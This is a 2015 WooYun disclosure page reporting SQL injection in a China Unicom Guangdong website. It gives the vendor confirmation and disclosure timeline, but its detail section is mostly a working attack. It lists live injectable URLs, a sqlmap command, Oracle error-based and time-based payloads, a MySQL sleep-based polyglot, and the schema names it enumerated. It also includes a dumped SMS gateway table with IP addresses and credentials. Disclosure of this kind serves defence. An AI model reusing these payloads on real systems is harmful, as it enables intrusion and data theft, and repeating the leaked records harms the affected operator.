当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104035

漏洞标题:中国联通某地方多处SQL注入泄漏大量数据

相关厂商:中国联通

漏洞作者: Taro

提交时间:2015-03-27 12:49

修复时间:2015-05-16 08:08

公开时间:2015-05-16 08:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-27: 细节已通知厂商并且等待厂商处理中
2015-04-01: 厂商已经确认,细节仅向厂商公开
2015-04-11: 细节向核心白帽子及相关领域专家公开
2015-04-21: 细节向普通白帽子公开
2015-05-01: 细节向实习白帽子公开
2015-05-16: 细节向公众公开

简要描述:

rt.

详细说明:

广东联通手机留言
第一处post注入
http://www.186online.com/usermanager/login.do
autologin=true&passWord=g00dPa%24%24w0rD&Submit232=%c2%a0%b5%c7%c2%bc%c2%a0&userName=1'%22

3920C44201B344ED8026347B28593C03.png


sqlmap -u "http://www.186online.com/usermanager/login.do" --data="autologin=true&passWord=g00dPa%24%24w0rD&Submit232=%c2%a0%b5%c7%c2%bc%c2%a0&userName=1" -p "userName"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: userName
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: autologin=true&passWord=g00dPa$$w0rD&Submit232=%c2%a0%b5%c7%c2%bc%c2%a0&userName=1' AND 3000=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(111)||CHR(114)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (3000=3000) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(109)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'GWgd'='GWgd
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: autologin=true&passWord=g00dPa$$w0rD&Submit232=%c2%a0%b5%c7%c2%bc%c2%a0&userName=1' AND 7996=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'UjGl'='UjGl
---
[00:40:54] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[00:40:54] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[00:40:54] [INFO] fetching database (schema) names
[00:40:55] [INFO] the SQL query used returns 27 entries
[00:40:56] [INFO] retrieved: BILLSEND
[00:40:57] [INFO] retrieved: COMMON
[00:40:58] [INFO] retrieved: CTXSYS
[00:40:59] [INFO] retrieved: DBSNMP
[00:41:00] [INFO] retrieved: DMSYS
[00:41:01] [INFO] retrieved: DOCTOR_HENAN
[00:41:02] [INFO] retrieved: EMAIL
[00:41:04] [INFO] retrieved: EXFSYS
[00:41:06] [INFO] retrieved: FENGJY
[00:41:07] [INFO] retrieved: GROWSMS
[00:41:09] [INFO] retrieved: ITMUSER1
[00:41:11] [INFO] retrieved: MDSYS
[00:41:11] [INFO] retrieved: MICROBLOG
[00:41:12] [INFO] retrieved: OLAPSYS
[00:41:13] [INFO] retrieved: ORDSYS
[00:41:15] [INFO] retrieved: OUTLN
[00:41:15] [INFO] retrieved: SIGN
[00:41:16] [INFO] retrieved: SMSUSER
[00:41:18] [INFO] retrieved: SYS
[00:41:19] [INFO] retrieved: SYSMAN
[00:41:20] [INFO] retrieved: SYSTEM
[00:41:21] [INFO] retrieved: TIVOLI
[00:41:21] [INFO] retrieved: UNICOM_ALL
[00:41:23] [INFO] retrieved: WKSYS
[00:41:23] [INFO] retrieved: WK_TEST
[00:41:24] [INFO] retrieved: WMSYS
[00:41:24] [INFO] retrieved: XDB
Database: SMSUSER
Table: SMS_GATEWAY_USER
[2 entries]
+-------------------------+----------+-----------------------+------------------+-------------------------------------------------------------------------------------------------------------------------------+-----------+-----------+-----------+-------------+--------------+
| GW_ID | IS_GW_ID | BABILITY | ADD_TIME | CLIENT_IP | PASS_WORD | IS_ACTIVE | USER_NAME | IS_BABILITY | IS_CLIENT_IP |
+-------------------------+----------+-----------------------+------------------+-------------------------------------------------------------------------------------------------------------------------------+-----------+-----------+-----------+-------------+--------------+
| hn_tele_combox_b2b_1001 | close | gwmo-gwmt-appmt-appmo | 11-1\xd4\xc2 -10 | 112.94.162.157-211.147.251.59-58.248.253.73-220.196.52.101-211.96.27.169-192.168.10.171-58.248.253.88-192.168.10.88-127.0.0.1 | testpwd | active | testuser | open | open |
| hn_tele_combox_b2b_1001 | close | gwmo-gwmt | 10-12\xd4\xc2-09 | 112.94.162.157 | testpwd | active | testusr | close | close |
+-------------------------+----------+-----------------------+------------------+-------------------------------------------------------------------------------------------------------------------------------+-----------+-----------+-----------+-------------+--------------+


6`Z6WP@P3)UUEG([A2GV1KI.png


第二处注入
http://www.186online.com//usermanager/gd165login.do?autologin=true&passWord=g00dPa%24%24w0rD&Submit232=%c2%a0%b5%c7%c2%bc%c2%a0&userName=1'%22
userName参数注入
第三处注入
http://www.186online.com/phonebook/login.code?height=20&length=if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/&width=70
length=,width=两个参数袔注入

漏洞证明:

http://www.186online.com//usermanager/gd165login.do?autologin=true&passWord=g00dPa%24%24w0rD&Submit232=%c2%a0%b5%c7%c2%bc%c2%a0&userName=1'%22

修复方案:

参数过滤

版权声明:转载请注明来源 Taro@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-04-01 08:07

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理单位处置.

最新状态:

暂无